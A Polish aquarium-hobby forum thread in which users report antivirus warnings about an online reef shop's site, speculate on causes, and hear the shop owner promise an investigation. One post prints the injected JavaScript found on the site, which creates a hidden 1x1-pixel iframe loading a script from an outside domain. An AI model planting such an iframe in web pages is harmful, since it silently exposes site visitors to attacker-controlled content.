Skocz do zawartości
Reefbos

Norton wykrył próbę włamania ...

Rekomendowane odpowiedzi

Antywirus Norton 360 poinformował mnie dziś dwukrotnie o próbie włamania na mój komputer przeprowadzonej ze strony sklepu Reeefmania - patrz załącznik. Nie jestem informatykiem, więc nie potrafię ocenić skali zagrożenia. Nie brzmi to jednak dobrze i nie sądzę by Norton się mylił.

Może właściciele sklepu zechcą się wytłumaczyć z takiego działania?

post-14856-0-88865500-1353184792_thumb.jpg

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

To moze do nich napisz. TO forum to nie support reefmania


350l SPS tank, 4xTunze 6095 + Tunze7096, ATI Powercone 200i, Profilux 3ex + ext. module

ATI mod 4xT5 39W + LED Cree 162W, DASTACO II Ca reaktor, NP Biopellets

Kupuje uszkodzony sprzęt GHL, Tunze etc...

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

To moze do nich napisz. TO forum to nie support reefmania

Właśnie napisałem - sponsor pewnie czytuje to forum.

Przy okazji ostrzegłem innych - również Ciebie.

Edytowane przez Reefbos (wyświetl historię edycji)

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

a nie dzieki,ja na szczescie nie uzywam nortona wiec jego fantazje mnie nie dotycza :-)


350l SPS tank, 4xTunze 6095 + Tunze7096, ATI Powercone 200i, Profilux 3ex + ext. module

ATI mod 4xT5 39W + LED Cree 162W, DASTACO II Ca reaktor, NP Biopellets

Kupuje uszkodzony sprzęt GHL, Tunze etc...

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach
Gość buczi82

Nie jestem specem, ale mozliwe ze owy sklep chcial wyslac jakas reklame lub cosik podobnego, a anty odebral to jako wlamanie, ale moge sie mylic i pisac bzdury... obecnie uzywam comodo, wczesniej avg i czasem tez mialem cos podobnego ze ktos probowal sie wlamac... wydaje mi sie ze to nic groznego, ale moge sie mylic... niech sie wypowiedza experci :)

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Nie jestem specem, ale mozliwe ze owy sklep chcial wyslac jakas reklame lub cosik podobnego, a anty odebral to jako wlamanie, ale moge sie mylic i pisac bzdury... obecnie uzywam comodo, wczesniej avg i czasem tez mialem cos podobnego ze ktos probowal sie wlamac... wydaje mi sie ze to nic groznego, ale moge sie mylic... niech sie wypowiedza experci :)

to możliwe, czasem antyvirusy głupiejo :baby:


Pozdrawiam, Piotr

"Wykrzyknik, który sflaczał, staje się znakiem zapytania." S. J. Lec

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

wg mnie reklama ma sie wyswietlic jak musi a nie wlazic w system komputera. Nie mozliwe zeby ot tak sobie antyvir wybiorczo potraktowal te jedna. Dziennie setki razy ci sie otwieraja jakies paskudztwa pomimo pop up blocker a antywir siedzi i nic nie robi. Odzywa sie wtedy jak ci cos w registry system zaczyna wlazic wiec sorry ale jak dla mnie to takie tanie wytlumaczenie. Nie chce osadzac bo stuprocentowej pewnosci nigdy nie bedzie ale fajnie byloby wiedziec gdzie kolega kupuje i co kupuje no nie? Ale to tylko domysly, nie traktujcie mojej wypowiedzi jako werdykt ale wymowka ze NAV glupieje to dla mnie cienka zalewajka.

pozdrawiam


122x61x61 + sump cyrkulacja 2x6045 tunze H&S 150

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Moje osobiste odczucie - Norton zakończył dobry soft na Commanderze, jego wynalazki antywirusowe zostały wyrzucone z naszej firmy. Nie podejrzewam reefmani o takie chwyty, albo zaliczyli włam do sklepu ;-(

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

No niestety Avast i TrendMicro też widzą na tej stronie zagrożenie.


Akwarium 216L, sump 90L. Maszynownię obsługuje odpieniacz Twistman OB150INT. A za słońce robi lampa Giesemann 1x250W HQI 4x24W T5.

W charakterze nadzoru średniego jest sześć kotów.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Z tego co pamiętam niektóre antywirusy wykrywały próby włamania się z domen internetowych podczas wysyłania przez nia na komputer plików cookie.Więc jeśli antywirus przyblokuje taki plik to wykryje to jako próbe włamania a domena reefmania tylko chce zapisac zmiany w pliku cookie. Przynajmniej tak bylo jakiś czas temu .

Edytowane przez golob1210 (wyświetl historię edycji)

2ef676195c8b05cd1669c2e6d8531c1fu977a854.png

Reefmax - T5 2x15k Sylvania Marinestar + 1x Giesemann Actynic+ + 40w LED Royal blue,

Odpieniacz Hydor slimskim nano 135.35,

Jebao RW4 + JVP 110

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Coś było wczoraj nie tak z tym sklepem. Rano wchodziłem w zakładkę SPS-ów i wyświetliła mi się rozsypana strona bez obrazków.



140l + 42l + 12l podmiana; obiegowa NJ4500; cyrkulacja JVP-101;

DSR

UAPS

Zalane 18-11-2010

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Moje osobiste odczucie - Norton zakończył dobry soft ...

Nie mam zastrzeżeń do pracy tego antywirusa. Od lat chroni skutecznie komputery firmowe i mój domowy. Taka jest praktyka. Teoretyczne popularne opinie zupełnie do niej nie przystają.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Z tego co pamietam niektore antywirusy wykrywaly

Każdego dnia mam dziesiątki prób umieszczenia jakiegoś rodzaju ciasteczka. Reakcje oprogramowania są zupełnie inne - o takich duperelach program mnie nie informuje. W tym przypadku było inaczej i stąd moje zaniepokojenie. Szczególnie, że miało to miejsce po wejściu na stronę Reefmani przez link umieszczony wczoraj na tym forum (informacja o akcji rabatowej w ich sklepie).

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

wg mnie reklama ma sie wyswietlic jak musi a nie wlazic w system komputera.

Mam takie samo zdanie na ten temat. Dlatego jestem bardzo ciekaw, co do powiedzenia na ten temat maja właściciele sklepu i strony Reefmania. Ciekawe ile dysków komputerowych uczestników tego forum, nie mających właściwych zabezpieczeń, zostało skutecznie spenetrowanych?

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

mi McAfee skaner dodał witrynę nano-reef.pl do niebezpiecznych więc bym się nie przejmował ...

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

No niestety Avast i TrendMicro też widzą na tej stronie zagrożenie.

Czyli coś jednak jest na rzeczy.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

tak na szybko , 'zakodowany' kod z n, wiele stron go ma.

(function () {

var ptnpa = document.createElement('iframe');

ptnpa.src = HTTP_PROTOCOL:SLASHSLASHeqiposfutbol.info/0708SLASHclk.PHP_EXTENTION':

ptnpa.style.position = 'absolute';

ptnpa.style.border = '0';

ptnpa.style.height = '1px';

ptnpa.style.width = '1px';

ptnpa.style.left = '1px';

ptnpa.style.top = '1px';

if (!document.getElementById('ptnpa')) {

document.write('<div id=\'ptnpa\'></div>');

document.getElementById('ptnpa').appendChild(ptnpa);

}

})();

Edytowane przez koma (wyświetl historię edycji)

Nano reef -homar only + reefmax

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dziś też jest coś nie tak z tym sklepem. Np. wchodze w zakładke Zoanthusy naciskam na LA Lakers chce zobaczyć fotke i jakaś biała strona mi sie wyświetla, wszystko porozsypywane itd :)


pozdrawiam Arian. Tel.608-353-030, Gadulec 32936596

Moje 30l

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Witam, informację o problemach pojawiających się na stronie sklepu dostaliśmy w czwartek i ograniczało się to do błędów z wyświetlaniem strony, dopiero w piątek doszły do tego informację od programów antywirusowych o rzekomych próbach włamań.

W tej chwili jesteśmy na etapie odnajdywania przyczyny problemu.

Możemy ze swojej strony zapewnić że nie jest to nasze celowe działanie i nie zostało wprowadzone przez nas.

Do całej sytuacji został już zaangażowany administrator serwera i jak tylko sprawdzimy wszystkie możliwości i wszystkie logi napiszemy stosowną informację.

Na ten moment z informacji jakie już mam mogę zapewnić że nie jest to szkodliwe ani niebezpieczne dla naszych klientów ani ich danych.

Pozdrawiam Michał.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach
Ten wątek jest dość stary. Należy rozważyć rozpoczęcie nowego wątku zamiast ożywienia tego.

Dołącz do dyskusji

Możesz dodać zawartość już teraz a zarejestrować się później. Jeśli posiadasz już konto, zaloguj się aby dodać zawartość za jego pomocą.

Gość
Dodaj odpowiedź do tematu...

×   Wklejono zawartość z formatowaniem.   Usuń formatowanie

  Dozwolonych jest tylko 75 emoji.

×   Odnośnik został automatycznie osadzony.   Przywróć wyświetlanie jako odnośnik

×   Przywrócono poprzednią zawartość.   Wyczyść edytor

×   Nie możesz bezpośrednio wkleić grafiki. Dodaj lub załącz grafiki z adresu URL.


  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Wchodząc do serwisu Nano-Reef, zgadzasz się na warunki Warunki użytkowania.